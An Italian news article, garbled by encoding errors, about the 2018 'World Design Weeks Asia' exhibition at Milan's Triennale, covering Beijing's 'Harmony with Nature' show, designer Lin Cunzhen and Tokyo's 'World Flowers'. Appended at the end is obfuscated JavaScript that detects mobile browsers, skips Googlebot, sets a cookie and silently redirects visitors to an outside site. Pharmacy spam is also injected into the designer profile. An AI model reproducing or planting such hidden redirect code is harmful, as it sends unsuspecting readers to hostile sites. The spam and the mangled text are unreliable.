News

World Design Weeks Asia, dal 17 al 22 aprile alla Triennale di Milano

In occasione del Fuorisalone 2018 il World Design Weeks Asia ha invitato le cittA� di Pechino e Tokyo a presentare, dal 17 al 22 aprile presso la Triennale di Milano, la��esposizione tematica a�?WORLD DESIGN WEEKS ASIA IN MILANa�?.

La mostra, co-organizzata dalla Beijing Design Week e dalla Tokyo Design Week, sostenuta dal Sino European Innovation Institute, A? divisa in due sezioni: la prima, interamente dedicata a Pechino, presenta il progetto di design a�?Harmony with Naturea�?, mentre la seconda, tributo di Tokyo, presenta la grande installazione a�?World Flowersa�?.A�

BEIJING DESIGN WEEK – HARMONY WITH NATURE
Curata dal Professore Xu Ping e dalla Professoressa Lin Cunzhen, docente alla China Central Academy of Fine Arts (giA� designer delle medaglie e del logo delle Olimpiadi Pechino 2008, nonchA� ideatrice del logo delle Olimpiadi Invernali Pechino 2022), l’esposizione “Harmony with Nature” si ispira alla��antica filosofia cinese del Feng-Shui e alla��idea che la��uomo possa costruire a�?con il territorioa�? e non a�?controa�? il territorio, rimettendo al centro la simmetria tra uomo e natura.A�

La mostra ha come punto di partenza le prospettive e le esperienze della Cina contemporanea, ed esplora le possibilitA� e modalitA� di applicazione pratica del concept a�?In Armonia con la Naturaa�? alla��interno della vita quotidiana.

In esposizione a Milano quasi cento articoli tra ceramiche, arredamento e gioielleria, realizzati da nove designer: Hang Hai, He Yang, Lin Cunzhen, Liu Xiaokang, Li Yingjun, Peng Wenhui, Teng Fei, Yang Mingjie, Zhong Song.A�

Lin Cunzhen: a�?Il significato del tema della��esposizione A? quello di un ritorno alle origini del design per fornire, ad un mondo tormentato da contraddizioni, un nuovo prototipo portatore della��idea secondo cui a�?uomo e natura sono in armonia, cosA� come lo sono con dioa�?. A�

a�?Harmony with Naturea�? significa quindi progettare per la��uomo ma anche per la��ambiente. Non A? la ricerca di una configurazione perfetta bensA� la ricerca di un tutto armonico fra elementi e ambiente, la��accettazione dei cambiamenti naturali con i quali convivere, misurando la��equilibrio fra tecniche costruttive, materiali indigeni e natura circostante.

Il designer non puA? prescindere da una soluzione simmetrica tra interno ed esterno: il design torna ad essere un processo naturale primitivo, capace di coniugare qualitA� della vita e qualitA� della��ambiente, di indagare la��uso razionale ed efficace delle risorse culturali cosA� come delle risorse high-tech.

PerchA� nella dialettica tra ciA? che cambia e ciA? che rimane immutato, soltanto gli schemi del design cambiano: ciA? che rimane immutata A? la��eterna ricerca di bellezza e raffinatezza.A�

Dopo Milano il a�?Beijing Design Weeka�? approderA� a CittA� del Messico e Buenos Aires.

LIN CUNZHEN
Associate Professor e Assistant Dean della Design School dell’Accademia centrale cinese di Belle arti di Pechino, Lin Cunzhen cardura no rx, zithromax reviews. A? stata la��artista che ha disegnato il logo per i XXIV Giochi Olimpici Invernali di Beijing 2022 (4-20 febbraio 2022): un simbolo dai molteplici colori, che vede nel giallo e nel rosso un richiamo alla bandiera della Cina e alla passione sportiva; mentre le sfumature di blu fanno riferimento al mondo dei sogni, delle aspirazioni, ma anche alla purezza del ghiaccio e della neve.

Per i XIII Giochi Paralimpici Invernali di Beijing 2022 (4-13 marzo 20122) invece il logo disegnato da Lin Cunzhen riprende il carattere cinese utilizzato per la parola a�?volarea�? e richiama un atleta in sedia a rotelle nella��atto di tagliare il traguardo.

Lin Cunzhen ha inoltre disegnato la mascotte dei Campionati del mondo Pechino 2015 per la��International Association of Athletics Federations (IAAF), ha curato il visual-design per la cittA� di Pechino durante la��Expo Shangai 2010, e inoltre ha progettato la��immagine coordinata per i Giochi della XXIX Olimpiade, svoltasi a Pechino nel 2008.A�

TOKYO DESIGN WEEK a�� WORLD FLOWERS
Naked, rinomato gruppo giapponese dei nuovi media interattivi, A? giA� stato fautore di prodotti di successo, quali la a�?Tokyo Art Citya�? e a�?Flowersa�?. Il a�?World Flowersa�? A? un prodotto interattivo e multimediale: come in un grande libro da sfogliare, contiene una��introduzione al network delle World Design Weeks, racconta storie di design all’interno delle cittA�, rivelandone le diverse unicitA�.

 

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}